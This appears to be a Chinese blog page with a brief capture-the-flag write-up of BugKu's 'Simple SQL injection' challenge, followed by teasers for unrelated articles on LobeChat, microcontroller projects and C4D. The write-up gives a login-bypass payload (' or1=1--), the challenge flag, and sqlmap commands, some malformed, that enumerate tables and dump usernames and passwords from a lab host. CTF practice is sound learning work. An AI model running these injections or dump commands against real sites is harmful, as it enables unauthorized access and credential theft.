news 2026/6/10 19:47:39

BugKu web 之 Simple SQL injection

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
BugKu web 之 Simple SQL injection 


' or1=1--

密码任意都可以,账号使用万能密码。

Flag: flag{95f2ab52fc27f73b4c6cf416082c2034}

但是不走捷径,该怎么做呢?

显示登录失败。

提示:尝试分析新闻详情页的URL参数

随便点击一篇新闻,然后用sqlmap进行爆破。

python sqlmap.py http://171.80.2.169:19019/article?id=1--batch

SQLite 无「数据库」概念(只有单个文件),直接枚举所有表。

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch --tables


枚举 users 表的所有字段

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch -Tusers--columns

直接提取 users 表中 username 和 password 字段的所有数据

python sqlmap.py -u"http://171.80.2.169:19019/article?id=1"--batch -Tusers-C username,password --dump

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/10 15:11:28

LobeChat神马搜索移动适配建议

LobeChat 与神马搜索的移动端融合:打造“即搜即聊”的智能交互新范式 在移动互联网进入存量竞争的时代,用户对信息获取效率的要求已从“快”转向“准”和“懂我”。传统的关键词匹配式搜索虽然成熟,但在面对复杂意图、多轮追问或需要综合判断…

作者头像 李华
网站建设 2026/6/9 18:34:47

基于AT89C51单片机的多功能遥控器设计

基于AT89C51单片机的多功能遥控器设计 第一章 系统概述 传统遥控器多为单一设备专用,存在功能局限、按键冗余、兼容性差等问题,难以满足现代家庭多设备控制的需求。基于AT89C51单片机的多功能遥控器,以高性价比的AT89C51为控制核心&#xff0…

作者头像 李华
网站建设 2026/6/10 16:48:30

LobeChat本地部署避坑指南:常见问题及解决方案汇总

LobeChat本地部署避坑指南:常见问题及解决方案汇总 在AI应用加速落地的今天,越来越多开发者和企业希望构建一个既能保护数据隐私、又具备强大交互能力的私有化聊天系统。然而,当面对OpenAI等闭源平台时,数据出境风险、高昂调用成本…

作者头像 李华
网站建设 2026/6/10 16:56:28

基于单片机太阳能热水器自动控制系统

基于单片机太阳能热水器自动控制系统 一、系统总体设计 太阳能热水器自动控制系统以“节能高效、精准调控、稳定可靠”为核心目标,面向家庭及小型商用场景,解决传统太阳能热水器依赖人工操作、水温水位控制不准、能源利用率低等问题。系统采用分层架构设…

作者头像 李华
网站建设 2026/6/10 2:26:54

AI 与 C4D 共生:渲染效率优化、建模精度瓶颈及行业演进路径

一、C4D 的不可替代性:细分赛道的效率核心​C4D 的核心价值在于易用性与场景适配的平衡。相较于 Maya 的长周期动画特效、3ds Max 的建筑工业领域,其以简洁界面、低学习门槛及 AE 协同优势,成为栏目包装、电商视觉等快速出效果场景的 “效率利…

作者头像 李华